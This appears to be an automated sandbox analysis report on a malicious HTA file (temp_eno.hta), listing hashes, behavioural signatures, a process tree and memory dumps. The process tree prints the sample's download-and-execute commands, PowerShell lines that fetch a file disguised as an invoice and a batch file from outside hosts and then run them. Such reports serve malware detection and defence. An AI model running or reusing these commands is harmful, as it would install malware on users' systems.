Analysis
-
max time kernel
399s -
max time network
411s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
24-01-2023 22:47
Static task
static1
Behavioral task
behavioral1
Sample
temp_eno.hta
Resource
win10-20220901-en
11 signatures
600 seconds
Behavioral task
behavioral2
Sample
temp_eno.hta
Resource
win7-20221111-en
6 signatures
600 seconds
General
-
Target
temp_eno.hta
-
Size
1KB
-
MD5
2552f7a77b1834ebc2c62e2f9432e54c
-
SHA1
eedee537ce4bcc252358a1e1a8687b2e50ed19f8
-
SHA256
28deee1dd68bfd6a75ca2794fcae30fa3d349afa4e4bbf5bf8382eefc10a81cf
-
SHA512
5218336d8fb62e68b44a2469ea3cb24b5c94168cc16e9619f6929f75108c36ecabafc8bc6eac1ea4391a88f493543bc8e301c5f74ee30eda135aaed1caecb1fb
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1180 584 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 468 584 cmd.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1488 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 536 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1180 wrote to memory of 536 1180 cmd.exe powershell.exe PID 1180 wrote to memory of 536 1180 cmd.exe powershell.exe PID 1180 wrote to memory of 536 1180 cmd.exe powershell.exe PID 468 wrote to memory of 1488 468 cmd.exe powershell.exe PID 468 wrote to memory of 1488 468 cmd.exe powershell.exe PID 468 wrote to memory of 1488 468 cmd.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\temp_eno.hta"1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\cmd.execmd /c powershell Invoke-WebRequest -Uri https://www.onenotegem.com/uploads/soft/one-templates/four-quadrant.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://www.onenotegem.com/uploads/soft/one-templates/four-quadrant.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c powershell Invoke-WebRequest -Uri https://transfer.sh/get/Ec8pRH/as11.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://transfer.sh/get/Ec8pRH/as11.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/536-64-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/536-55-0x0000000000000000-mapping.dmp
-
memory/536-67-0x00000000028AB000-0x00000000028CA000-memory.dmpFilesize
124KB
-
memory/536-56-0x000007FEFB941000-0x000007FEFB943000-memory.dmpFilesize
8KB
-
memory/536-66-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/536-60-0x000007FEF3B40000-0x000007FEF4563000-memory.dmpFilesize
10.1MB
-
memory/536-62-0x000007FEEEC90000-0x000007FEEF7ED000-memory.dmpFilesize
11.4MB
-
memory/1488-59-0x000007FEF3B40000-0x000007FEF4563000-memory.dmpFilesize
10.1MB
-
memory/1488-61-0x000007FEEEC90000-0x000007FEEF7ED000-memory.dmpFilesize
11.4MB
-
memory/1488-63-0x00000000026D4000-0x00000000026D7000-memory.dmpFilesize
12KB
-
memory/1488-65-0x000000001B7B0000-0x000000001BAAF000-memory.dmpFilesize
3.0MB
-
memory/1488-57-0x0000000000000000-mapping.dmp
-
memory/1488-68-0x00000000026DB000-0x00000000026FA000-memory.dmpFilesize
124KB
-
memory/1488-69-0x00000000026D4000-0x00000000026D7000-memory.dmpFilesize
12KB
-
memory/1488-70-0x00000000026DB000-0x00000000026FA000-memory.dmpFilesize
124KB
-
memory/1772-54-0x00000000757E1000-0x00000000757E3000-memory.dmpFilesize
8KB